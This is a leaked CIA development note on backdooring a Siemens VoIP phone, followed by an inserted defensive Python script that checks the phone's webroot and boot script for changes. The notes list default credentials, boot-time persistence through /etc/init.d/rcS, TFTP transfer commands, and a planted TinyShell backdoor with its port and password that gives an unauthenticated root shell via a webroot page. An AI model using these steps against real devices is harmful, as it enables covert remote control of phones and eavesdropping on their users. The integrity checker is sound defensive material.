Vault7: CIA Hacking Tools Revealed
sontaran
Development Notes
Credentials
- https://10.3.2.151/
- phone menu password – 123456
- web interface admin – 123456
System Configuration
webroot = /Opera_Deploy/appWeb/web
- Phone runs linux-2.4.31
- Processor is MIPS-BE
- /tmp is reset each time the phone is booted
- for boot time execution, creating /etc/rc.local, /etc/init.d/test.sh, /etc/rc.d/rc3.d/test.sh did not work. Might try modifying /etc/init.d/rcS or /etc/inittab or /etc/profile (per INCA_IP2_LinuxBSP_Rel2.0_UM_PR_Rev1.0.pdf, Section 2.2). /etc/init.d/rcS tested and known to work.
- System loads kernel drivers in /etc/init.d/rcS from /lib/modules/2.4.31-INCAIP2-01.03.00/kernel/drivers/siemens-opera/
Establishing Initial Access for Development
- Use the hive-builder 10.2.5.2 (or another) to cross compile code for the phone.
- The phone temporarily allows SSH access to the admin user via the web interface (Administrator Pages > Maintenance > Secure Shell).
- Files can be transferred to the phone via TFTP (don't forget to chmod a+x the file once it is transferred to the phone).
phone$ tftp -g -r <filename> <hostname> <port>
wkstn$ sudo /usr/sbin/in.tftpd --daemon --port 6969 /tmp (this is for atftpd)
- The web server attempts to execute (yes, execute) any page requested by a client.
- The webroot directory is writable by the admin user.
- TinyShell (tsh) has been compiled for the phone for port 12345 and password "wboKtbEYVTWAVIig". Using the admin user via SSH and TFTP, tsh was put in /usr/sbin and the webroot. Additionally, a script named tshd.cmd has been placed in the webroot. To start tsh, hit this page: https://10.3.2.151/tshd.cmd . Web interface credentials are not required. That page will provide status, and in the background, it will kick off tsh with root privileges. Use the tsh client to connect for a root shell.
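A defender's integrity check for the two locations these notes single out, the webroot (where any file is executed on request) and /etc/init.d/rcS, as an added example that is not part of the original notes. It assumes a copy of the phone's root filesystem and a baseline manifest taken from a known-good image; the sample tree and file names in demo() are constructed.

```python
import hashlib, os, stat, tempfile

WEBROOT = "Opera_Deploy/appWeb/web"   # webroot path from the notes, relative to the rootfs copy
BOOT_SCRIPT = "etc/init.d/rcS"        # boot-time script the notes report as working

def sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def manifest(root):
    """Hash rcS and every webroot file: {relative path: sha256}."""
    out = {}
    rcs = os.path.join(root, BOOT_SCRIPT)
    if os.path.isfile(rcs):
        out[BOOT_SCRIPT] = sha256(rcs)
    for dirpath, _, files in os.walk(os.path.join(root, WEBROOT)):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root).replace(os.sep, "/")] = sha256(full)
    return out

def audit(root, baseline):
    """Return sorted (path, finding) pairs where root differs from the baseline manifest."""
    current, findings = manifest(root), []
    for rel, digest in current.items():
        if rel not in baseline:
            # Every webroot file is effectively code on this server; note the exec bit too.
            mode = os.stat(os.path.join(root, rel)).st_mode
            kind = "unexpected executable" if mode & stat.S_IXUSR else "unexpected file"
            findings.append((rel, kind))
        elif digest != baseline[rel]:
            findings.append((rel, "modified"))
    findings += [(rel, "missing") for rel in baseline if rel not in current]
    return sorted(findings)

def demo():
    """Constructed sample tree: take a baseline, then change rcS and add a webroot file."""
    root = tempfile.mkdtemp()
    web = os.path.join(root, WEBROOT)
    for d in (web, os.path.join(root, "etc/init.d")): os.makedirs(d)
    rcs = os.path.join(root, BOOT_SCRIPT)
    with open(rcs, "w") as f: f.write("#!/bin/sh\n# constructed stock rcS\n")
    with open(os.path.join(web, "index.html"), "w") as f: f.write("<html></html>\n")
    baseline = manifest(root)
    with open(rcs, "a") as f: f.write("echo constructed-change\n")
    extra = os.path.join(web, "extra.cmd")
    with open(extra, "w") as f: f.write("constructed\n")
    os.chmod(extra, 0o755)
    return audit(root, baseline)

if __name__ == "__main__": print(demo())
```

Because /tmp is cleared on every boot, changes that survive a reboot have to live in persistent paths such as these, which is why the manifest covers them.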
SDK
- INCA, VMMC, and HAPI driver code is in the SDK Bundle. Run EASY\Software\TAPIv3\ifx_tapi.run and it will create a folder ifx_tapi with a driver for each folder. Although kernel code, there are several header files for the using....
- Example user-space programs are in the Linux Board Support Package. Untar EASY\Software\Linux_BSP. In the extracted files, iip2_linuxbsp_02.02.01\source\user\ifx.